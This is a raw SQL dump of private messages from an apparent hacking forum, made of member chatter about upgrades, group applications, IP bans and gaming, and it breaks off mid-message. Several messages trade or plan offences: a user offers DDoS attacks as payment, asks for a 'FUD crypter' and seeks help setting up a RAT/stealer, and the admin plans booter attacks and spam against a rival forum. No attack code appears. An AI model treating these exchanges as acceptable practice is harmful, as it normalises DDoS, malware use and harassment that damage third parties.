[/quote] No problem. [/quote] You wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder. [/quote] Nope, my PC broke down so I\'m buying a new one. [/quote] That sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D [/quote] Cool, BTW I thought you had a free upgrade right? [/quote] I did?! [/quote] I thought. Not sure. Well umm if you get the upgrade, what will you do for me? I don\'t want the DDoS. [/quote] Oh erm, I don\'t really know then. xD Thats my only service. [/quote] Be active and contribute daily. [/quote] Sounds good. [/quote] Cool, I will upgrade you tomorrow but if you go inactive for a week or more without telling us that you are going somewhere then I will remove it and put you back when you come back. Deal? [/quote] Deal.', '1349007483', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2250', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Gamers', '0', 'You have been Accepted.. Obviously. :D ', '1349024317', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2254', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Usergroup error', '0', '[quote=\'t3h jok3r\'] Earlier on today when I made your usergroup I forgot to change the usergroup color from light green to grey. It\'s done now. [/quote] If you could, May I get the userbar changed to this http://i.imgur.com/CWKlk.png The colors of the current one don\'t really match the websites colors.', '1349024731', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2260', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Hiya ', '0', 'Hey I saw you do a GFX service? I was hoping I could get a free signature. ;D Thanks for your time, if you agree to do this for me, and you make it really HQ I\'m willing to pay you a little money. I hope you\'ll consider my request. Thanks again ~GRONgamer61', '1349025957', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2264', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Hiya ', '0', '[quote=\'R?????zo?\'] [quote=\'GRONgamer61\'] Hey I saw you do a GFX service? I was hoping I could get a free signature. ;D Thanks for your time, if you agree to do this for me, and you make it really HQ I\'m willing to pay you a little money. I hope you\'ll consider my request. Thanks again ~GRONgamer61 [/quote] what do you want to be made, i dont see your request. can you please post on my thread http://l33thacking.net/thread-431.html and I will do it for you :) [/quote] Made the post, I also updated what I would like it too be ;D', '1349029860', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2266', '61', '100', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Group', '0', 'Fill out an application in the thread, Please don\'t apply via user cp.', '1349036137', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2273', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'What did I do?!', '0', 'Dude you banned my IP?!?! For both my main VPN and my backup one???? What did I do??!? This is another VPN of mine..', '1349038900', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2278', '100', '82', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Loooool', '0', '[quote=\'iTzIpod\'] Booting Tyler :p [/quote] xDDDD', '1349048606', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2283', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\'] You have been upgraded hope you stay active and complete your side of the deal :D [/quote] Defiantly ;DDDD', '1349048711', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2286', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] You have been upgraded hope you stay active and complete your side of the deal :D [/quote] Defiantly ;DDDD [/quote] That was a fast reply. [/quote] I just happened to be checking my private messages when you sent it.', '1349048783', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2289', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] You have been upgraded hope you stay active and complete your side of the deal :D [/quote] Defiantly ;DDDD [/quote] That was a fast reply. [/quote] I just happened to be checking my private messages when you sent it. [/quote] Oh LOL. [/quote] How to I make the \"Elite\" usergroup tag show under my name rather then the \"Unique\" usergroup tag? ', '1349049058', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2292', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzGRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] You have been upgraded hope you stay active and complete your side of the deal :D [/quote] Defiantly ;DDDD [/quote] That was a fast reply. [/quote] I just happened to be checking my private messages when you sent it. [/quote] Oh LOL. [/quote] How to I make the \"Elite\" usergroup tag show under my name rather then the \"Unique\" usergroup tag? [/quote] UserCP>Group Memberships>elite>Display [/quote] Nope.. I can go as far as Group Memberships. Its ok I\'ll figure it out later. Thanks!', '1349049500', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2778', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Hey joker, are reg members able to neg rep? [/quote] Dude I swear to god I was about to PM you. Anyway, I need a new Mod not the best I can do but are you interested? I don\'t think they can. [/quote] Yes I am interested but I would prefer staff or admin but mod is okay for right now. Also since Itzipod or whatever his name is isnt mod or upgraded member could you remove his neg off of me? [/quote] Done and OK. [/quote] Thanks man, and thats why I love you NO HOMO [/quote] LOL btw I\'m planning an attack on AF are you interestd? If not then it\'s cool np. [/quote] Yes I am interested just hit me up with the info. [/quote] Tomorrow I\'m getting access to HF, so I will get their booters to hit Anarchy the whole week I will create fake accounts and SPAM anarchy. [/quote] Okay', '1349735757', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2780', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Ridiculous ', '0', 'Yo bro check my rep and see what NeonLights put. No body likes me lol.', '1349736194', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3028', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking. [/quote] For onshore I could a cheap hosting but domain depends. [/quote] Oh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also. [/quote] Yeah I noticed. [/quote] Also is apathy still going to be an admin? [/quote] Giving him another chance he said he was away because of the thanksgiving. [/quote] You know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back. [/quote] Can I get a screenshot or something to back up myself while talking to him? [/quote] Nevermind it was on 10-9-12 but if you want that screenshot then I could get it for you. [/quote] When was the last post? [/quote] 10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy. [/quote] Well OK then ;) [/quote] Does that help you? [/quote] Nope, it basically backups his story which means that he was out of town. BTW do you know the user Monkey? [/quote] Nope', '1350095178', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2782', '3', '203', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Why?', '0', 'Why do you not like me? I am no longer bitchy. I was only bitchy because I got demoted for nothing but then found out it was the system so I felt stupid so yea.', '1349737549', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2295', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Upgraded', '0', '[quote=\'t3h jok3r\'] [quote=\'iTzGRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'iTzGRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] You have been upgraded hope you stay active and complete your side of the deal :D [/quote] Defiantly ;DDDD [/quote] That was a fast reply. [/quote] I just happened to be checking my private messages when you sent it. [/quote] Oh LOL. [/quote] How to I make the \"Elite\" usergroup tag show under my name rather then the \"Unique\" usergroup tag? [/quote] UserCP>Group Memberships>elite>Display [/quote] Nope.. I can go as far as Group Memberships. Its ok I\'ll figure it out later. Thanks! [/quote] I did it for you. [/quote] ohh ! thanks XD', '1349050254', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2301', '199', '1', '199', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: L33THacking', '0', '[quote=\'t3h jok3r\'] So how do you find L33THacking? Are you liking us so far? [/quote] I saw the link to this forum in a pastebin I do not know from where and I like this forum very much.', '1349052149', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2304', '199', '1', '199', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: L33THacking', '0', '[quote=\'t3h jok3r\'] [quote=\'Anonymous™\'] [quote=\'t3h jok3r\'] So how do you find L33THacking? Are you liking us so far? [/quote] I saw the link to this forum in a pastebin I do not know from where and I like this forum very much. [/quote] Opps lol I meant how you find LH as in do you find it to be a cool site :) or boring :\'( [/quote] I\'m sorry, I\'m very tired I think this forum is very interesting.', '1349052345', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2307', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', '[quote=\'t3h jok3r\'] Sorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do. [/quote] It Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3', '1349066552', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2310', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My IP address banned', '0', 'Hey mate, I tried logging In, but this message came up that my IP has been banned: [IMG] http://i48.tinypic.com/214rpkp.png [/IMG] I\'m navigating via a proxy, and It\'s just too slow, hence can\'t browse the forums....', '1349092378', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2312', '61', '62', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Gamers', '0', 'You have been accepted. I too play counter:strike source and GO at a very competive level.', '1349100384', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2314', '62', '61', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Gamers', '0', '[quote=\'NXK\'] You have been accepted. I too play counter:strike source and GO at a very competive level. [/quote] we should play CS:GO together, heres my steam r3loadz0r', '1349105031', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2319', '61', '62', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Gamers', '0', '[quote=\'R?????zo?\'] [quote=\'NXK\'] You have been accepted. I too play counter:strike source and GO at a very competive level. [/quote] we should play CS:GO together, heres my steam r3loadz0r [/quote] Added you.', '1349123636', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2321', '61', '203', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Accepted', '0', 'You have been accepted. Try to post HQ in our groups sub forum.', '1349124754', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2323', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: plz read :D', '0', '[quote=\'NeonLights\'] go to this thread: http://l33thacking.net/thread-431-post-3127.html#pid3127 look at my reply :3 if u could make it happen it would be epic thx for ur time :D [/quote] check it on my thread :D', '1349129976', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2333', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Sorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do. [/quote] It Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3 [/quote] What? [/quote] Never mind lol I am in a tired state of mind.', '1349144728', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2336', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Sorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do. [/quote] It Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3 [/quote] What? [/quote] Never mind lol I am in a tired state of mind. [/quote] Why what\'s up? [/quote] I do not sleep enough, sports, life etc :/', '1349145600', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2339', '61', '199', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '2', 'Accepted', '0', 'You have been accepted. ', '1349179615', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2341', '100', '5', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Script', '0', '[quote=\'Timmy\'] Can I have it? [/quote] http://pastebin.com/EgnhCsGm Have fun!', '1349187754', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2344', '61', '5', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Credit', '0', 'Make sure when you C+P a tutorial you give proper credits to the writer.', '1349220829', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2349', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Sorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do. [/quote] It Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3 [/quote] What? [/quote] Never mind lol I am in a tired state of mind. [/quote] Why what\'s up? [/quote] I do not sleep enough, sports, life etc :/ [/quote] My life is worse. [/quote] What up? :o', '1349238092', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2351', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My IP address banned', '0', '[quote=\'t3h jok3r\'] [quote=\'mothered\'] Hey mate, I tried logging In, but this message came up that my IP has been banned: [IMG] http://i48.tinypic.com/214rpkp.png [/IMG] I\'m navigating via a proxy, and It\'s just too slow, hence can\'t browse the forums.... [/quote] Sorry for the inconvience. I mistakenly banned your IP through cloudflare because on Saturday night LH was receiving DDoS attacks. [/quote] No problem at all. I Initially thought you may have banned a range of IPs via the ACP, and mine fell Into that range. All good now :)', '1349238622', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2353', '100', '203', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'RAT\'ing/Stealer Help', '0', 'Hey man, so you think you could help me out this weekend over skype & teamviewer with setting up my RAT/stealer? thanks!', '1349312949', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2359', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', ':Yea sounds pretty shitty. D: [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Sorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do. [/quote] It Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3 [/quote] What? [/quote] Never mind lol I am in a tired state of mind. [/quote] Why what\'s up? [/quote] I do not sleep enough, sports, life etc :/ [/quote] My life is worse. [/quote] What up? :o [/quote] ATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for attendence(sucks) and no GF [/quote]', '1349320620', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2362', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', 'I only have the one account. :/ [quote=\'t3h jok3r\'] True btw do you have any fake accounts on HF? I really need to advertise on HF because that\'s the only place where I can get HQ members to stay on LH. [quote=\'Apathy\'] :Yea sounds pretty shitty. D: [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Sorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do. [/quote] It Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3 [/quote] What? [/quote] Never mind lol I am in a tired state of mind. [/quote] Why what\'s up? [/quote] I do not sleep enough, sports, life etc :/ [/quote] My life is worse. [/quote] What up? :o [/quote] ATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for attendence(sucks) and no GF [/quote] [/quote] [/quote]', '1349321068', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2367', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My IP address banned', '0', '[quote=\'t3h jok3r\'] [quote=\'mothered\'] [quote=\'t3h jok3r\'] [quote=\'mothered\'] Hey mate, I tried logging In, but this message came up that my IP has been banned: [IMG] http://i48.tinypic.com/214rpkp.png [/IMG] I\'m navigating via a proxy, and It\'s just too slow, hence can\'t browse the forums.... [/quote] Sorry for the inconvience. I mistakenly banned your IP through cloudflare because on Saturday night LH was receiving DDoS attacks. [/quote] No problem at all. I Initially thought you may have banned a range of IPs via the ACP, and mine fell Into that range. All good now :) [/quote] Thanks so do you like LH so far? [/quote] Yeah, It\'s quite a nice friendly environment to hang out. The theme reminds me of the old LH (l33thackers), but evidently, this one\'s a lot more relaxed and pleasing to navigate around. Good work with It :)', '1349326462', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2370', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', 'We do not have movie rips? [quote=\'t3h jok3r\'] OK, ask your friends if they are interested in learning SEing, getting PIDs, movie rips etc. [quote=\'Apathy\'] I only have the one account. :/ [quote=\'t3h jok3r\'] True btw do you have any fake accounts on HF? I really need to advertise on HF because that\'s the only place where I can get HQ members to stay on LH. [quote=\'Apathy\'] :Yea sounds pretty shitty. D: [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Sorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do. [/quote] It Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3 [/quote] What? [/quote] Never mind lol I am in a tired state of mind. [/quote] Why what\'s up? [/quote] I do not sleep enough, sports, life etc :/ [/quote] My life is worse. [/quote] What up? :o [/quote] ATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for 